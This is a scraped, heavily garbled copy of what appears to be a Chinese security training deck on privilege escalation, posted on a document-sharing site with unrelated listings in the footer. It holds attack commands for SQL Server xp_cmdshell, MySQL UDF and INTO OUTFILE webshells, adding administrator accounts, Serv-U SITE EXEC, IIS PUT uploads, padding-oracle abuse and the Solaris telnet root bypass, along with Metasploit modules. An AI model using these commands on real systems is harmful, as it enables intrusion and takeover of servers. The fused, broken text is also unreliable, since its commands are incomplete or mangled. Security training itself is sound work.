版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
溢出攻溢出攻擊與提啟明星辰培訓(xùn)認(rèn)證部—王新目目提權(quán)演提權(quán)演示——SQL3提權(quán)演提權(quán)演示——運(yùn)行SQLTools,輸入目標(biāo)服務(wù)器IP、用戶名和4提權(quán)演示提權(quán)演示——(在客戶端SSMS中執(zhí)行EXECsp_configure'showadvancedoptions',1--RECONFIGUREWITHOVERRIDE-EXECsp_configure'xp_cmdshell',1-EXECsp_configureoptions',0--5提權(quán)演示——dbccaddextendedproc提權(quán)演示——dbccaddextendedprocdbccaddextendedproc("xp_cmdshell","xplog70.dll")沙盒提權(quán):(更多命令參考‘SQL修復(fù)資料.txt’)execmaster..xp_regwriteSelect*??????windows\system32\ias\ias.mdb','selectusersql$123/add")');Select*From?windows\system32\ias\ias.mdb','selectlocalgroupadministratorssql$6提權(quán)演提權(quán)演示——7提權(quán)演提權(quán)演示——混客SQL利用工具8提權(quán)演示——提權(quán)演示——點(diǎn)“設(shè)置”,連接SQL9提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——提權(quán)演示——提權(quán)演示——利用日志增量備份寫入一句話';alterdatabasevenussetRECOVERYFULL--';createtablecmd(aimage)--';backuplogvenustodisk='f:\cmd'with-';insertintocmd(a)values';backuplogvenustodisk‘c:\www\shell.asp'-??????提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——提權(quán)演示——提權(quán)演示——提權(quán)演示——提權(quán)演示——??mysql>usemysql>updateusersethost='%'wheremysql>flushC:\ProgramFiles\MySQL\MySQLServer??提權(quán)演示——提權(quán)演示——Usecreatetablevenus_tmp(cmdinsertintovenus_tmpvalues("<%executerequest("textarea1")%>");select*venus_tmpintoMySQL——udf提權(quán)步Udf.php已經(jīng)將udf.dll以二進(jìn)制的形式集成進(jìn)了phpMySQL——udf提權(quán)步Udf.php已經(jīng)將udf.dll以二進(jìn)制的形式集成進(jìn)了phpudf提權(quán)命c(diǎn)reatetablet_tmp(abcudf提權(quán)命c(diǎn)reatetablet_tmp(abcinsertintot_tmp??????createtablet_tmp(dataLONGBLOB);insertintot_tmpvalues("");updatet_tmp ??select*fromt_tmpintodumpfilecreatefunctioncmdshellreturnsstringsoname'udf.dll';selectcmdshell('netuseraa/add');droptableifexists?????select*fromt_tmpintodumpfileudf提權(quán)命要注意命udf提權(quán)命要注意命令中的字符都是英文字//版selectselect//版//查看mysql安裝路show//看各種變量ADS與ADS與對(duì)于5.1以上版本,默認(rèn)不存在\lib\pluginselect'xxx'intooutfileMysql提Mysql提Udf提Udf提權(quán)-linux平createtablet_tmp(datainsertintot_tmpupdatet_tmpset ;Udf提權(quán)-linux平Udf提權(quán)-linux平3.得到plugin目showvariableslikeplugin_dir/usr/local/mysql/lib/mysql/pluginselectdatafromt_tmpintoDUMPFILECREATEFUNCTIONsys_evalRETURNSstringSONAME'lib_mysqludf_sys.so';selectsys_eval('ls-l?????????提權(quán)演提權(quán)演示——useuseauxiliary/scanner/mysql/mysql_versionuseauxiliary/scanner/mysql/mysql_loginuseauxiliary/scanner/mysql/mysql_hashdumpuseauxiliary/admin/mysql/mysql_enum(CVE-2012-2122MySQL驗(yàn)證繞過,256??Phpmyadmin提權(quán)思Phpmyadmin提權(quán)思CreateTABLEvv(cmdtextNOTNULL);InsertINTOvv(cmd)VALUES('<?phpselectcmdfromvvintooutfileDropTABLEIFEXISTSvv;???????Phpmyadmin提權(quán)思createtablePhpmyadmin提權(quán)思createtabletemp_mix(datainsertintotemp_mixvalues????updatesetselect*fromtemp_mixinto'C:\\Windows\\System32\\udf.dll';-- createfunctioncmdshellreturnsstringsonameselectcmdshell('netuseraa/add');droptableifexiststemp_mix;????Oracle提默Oracle提默認(rèn)用戶scott/tiger,具有resource利用sql注入將scott提權(quán)至創(chuàng)建PL/SQL過程執(zhí)行系統(tǒng)命execmongodbmongodb提PHPMoAdmincurl"/moadmin.php"-d提權(quán)提權(quán)演示——制權(quán)提權(quán)演提權(quán)演示——破解很簡(jiǎn)單提權(quán)演示——??提權(quán)演示——??經(jīng)典的輸入法漏洞,SQLServer???提權(quán)演提權(quán)演示——端口可以利用4899弱口令掃描器掃出弱口提權(quán)演示提權(quán)演示——端口提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——利用vnc_passview獲取vnc的管理口提權(quán)提權(quán)演示——Serv-利用X-Scan發(fā)現(xiàn)Serv-U的一個(gè)弱口:Amdin+admin,此賬戶有執(zhí)行權(quán)提權(quán)命令QuotesiteexecnetusertestQuotesiteexecnetlocalgroupadministratorstest/add提權(quán)演提權(quán)演示——Serv-提權(quán)演提權(quán)演示——Serv-提權(quán)演提權(quán)演示——Serv-默認(rèn)管理賬戶默認(rèn)管理密碼默認(rèn)綁定提權(quán)演提權(quán)演示——Serv-兩種提權(quán)辦法一是利用提權(quán)演提權(quán)演示——Serv-兩種提權(quán)辦法提權(quán)演提權(quán)演示——Serv-遠(yuǎn)程連接時(shí)注意端口填寫fpipe打開提權(quán)演示——Serv-提權(quán)演示——Serv-下載文件提權(quán)演示——Serv-提權(quán)演示——Serv-CdLcdPutServUDaemon.ini賬戶權(quán)限:e—執(zhí)行pHfs-2.x遠(yuǎn)Hfs-2.x遠(yuǎn)程代碼執(zhí)Hfs2.3DFileZilla提FileZilla提提權(quán)演提權(quán)演示——IIS權(quán)限不提權(quán)演提權(quán)演示——IIS寫權(quán)限利利用IISPUTScaner可以批量掃描提權(quán)演提權(quán)演示——IIS寫權(quán)限利工具:老兵的IIS寫權(quán)限利用工Options選項(xiàng)可以查看IIS支持的操提權(quán)演提權(quán)演示——IIS寫權(quán)限利利用PUT直接寫一個(gè)一句話木提權(quán)演提權(quán)演示——IIS寫權(quán)限利再用MOVE命令將test.txt修改為提權(quán)演提權(quán)演示——IIS寫權(quán)限利成功利用一句話后提權(quán)演示——IIS6解提權(quán)演示——IIS6解析漏1.muma.asp;jpg文件名有分號(hào)路徑名含有有個(gè)條件:文件上傳后,不會(huì)被重命提權(quán)演示提權(quán)演示——IIS7提IIS7的提權(quán)0day,針對(duì)MS10-065-KB2124261-KB2271195-CVE-2010-提權(quán)提權(quán)演示——Tomcat漏洞Tomcat漏洞利用工ApacheTomcatCrack自動(dòng)化攻擊工具Tomcat批量Tomcat批量抓雞工提權(quán)演提權(quán)演示——Deployments>ManageDeployments>Add提權(quán)演提權(quán)演示——遠(yuǎn)程代碼執(zhí)行phpjboss.php2提權(quán)演提權(quán)演示——遠(yuǎn)程代碼執(zhí)行,工具JexBoss-JbossverifyandEXploitation提權(quán)演提權(quán)演示——Java反序列化,遠(yuǎn)程代碼執(zhí)行提權(quán)演提權(quán)演示——Java反序列化,反彈提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——提權(quán)演提權(quán)演示——WebLogicServerAdministrationConsoleworkshopDeploymentsWeb?????????提權(quán)提權(quán)演示——Elasticsearch提Elasticsearch提Elasticsearch遠(yuǎn)程代碼執(zhí)paddingpaddingPaddingoracle(MS10-070)漏洞檢測(cè)信息泄露、敏感文件讀取,例如paddingpadding查看源碼搜索WebResource.axd,找到然后,利用padBuster.pl計(jì)算Web.configZKonHQe3MWyTFog2IVA9Sj-ZKonHQe3MWyTFog216-encoding3-plaintext"|||~/Web.config“paddingpaddingrLCZG3p5Vx7zNIkXvQHI9QAAAAAAAAAAAAAAAAAAAAA116得到最終的秘鑰:(時(shí)間比較長(zhǎng)提權(quán)示提權(quán)示例——搜狗拼搜狗拼音有一個(gè)問題提權(quán)示提權(quán)示例——搜狗拼此目錄下有一個(gè)升級(jí)程序提權(quán)示例——CVE2012-提權(quán)示例——CVE2012-cve:2012-useSetSetlhost提權(quán)示例——JavaRMI提權(quán)示例——JavaRMIServerInsecureDefaultJavaCodeExecutionuseSet提權(quán)示例——提權(quán)示例——提權(quán)提權(quán)示例——Solaris10條件:Solaris10/11的telnet服務(wù)開命令:telnetlfroot可以繞過驗(yàn)證直接以root身份登vsFTPsmilefacetelnetvsFTPsmilefacetelnetpass另一個(gè)終端:-(注意分telnetcat提權(quán)演示—Apache解析提權(quán)演示—Apache解析漏ext2和ext1沒有定從后向前依次按擴(kuò)展名嘗試解析文提權(quán)演提權(quán)演示——紅色為手工添加的部分,圖片被作為腳本解析提權(quán)演提權(quán)演示——Nginx的%00解析漏洞低版本nginx,可以在文件名后面,添加php-cgi默認(rèn)php-cgi默認(rèn)配置漏IISNginxCGIphp的web應(yīng)用程序,而Apache
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025年制衣面料供應(yīng)居間合同
- 2025版小企業(yè)合同管理規(guī)范與合同管理信息化解決方案3篇
- 2025年超額展覽會(huì)保險(xiǎn)條款
- 二零二五版新型環(huán)保建材采購(gòu)合同樣本2篇
- 2025版企事業(yè)單位食堂員工招聘與服務(wù)協(xié)議3篇
- 2024-2025年中國(guó)寬帶行業(yè)市場(chǎng)評(píng)估分析及投資發(fā)展盈利預(yù)測(cè)報(bào)告
- 2025版小額貸款合同簽訂中的合同簽訂中的合同簽訂前的準(zhǔn)備與協(xié)商3篇
- 二零二五年度門面房裝修工程設(shè)計(jì)與施工質(zhì)量監(jiān)理合同
- 2025版建筑行業(yè)設(shè)備托管正規(guī)范本3篇
- 二零二五年度游艇俱樂部船舶租賃售后服務(wù)合同
- 2024年高考語(yǔ)文備考之??甲骷易髌罚ㄏ拢褐袊?guó)現(xiàn)當(dāng)代、外國(guó)
- 《裝配式蒸壓加氣混凝土外墻板保溫系統(tǒng)構(gòu)造》中
- T-CSTM 01124-2024 油氣管道工程用工廠預(yù)制袖管三通
- 2019版新人教版高中英語(yǔ)必修+選擇性必修共7冊(cè)詞匯表匯總(帶音標(biāo))
- 新譯林版高中英語(yǔ)必修二全冊(cè)短語(yǔ)匯總
- 基于自適應(yīng)神經(jīng)網(wǎng)絡(luò)模糊推理系統(tǒng)的游客規(guī)模預(yù)測(cè)研究
- 河道保潔服務(wù)投標(biāo)方案(完整技術(shù)標(biāo))
- 品管圈(QCC)案例-縮短接臺(tái)手術(shù)送手術(shù)時(shí)間
- 精神科病程記錄
- 閱讀理解特訓(xùn)卷-英語(yǔ)四年級(jí)上冊(cè)譯林版三起含答案
- 清華大學(xué)考博英語(yǔ)歷年真題詳解
評(píng)論
0/150
提交評(píng)論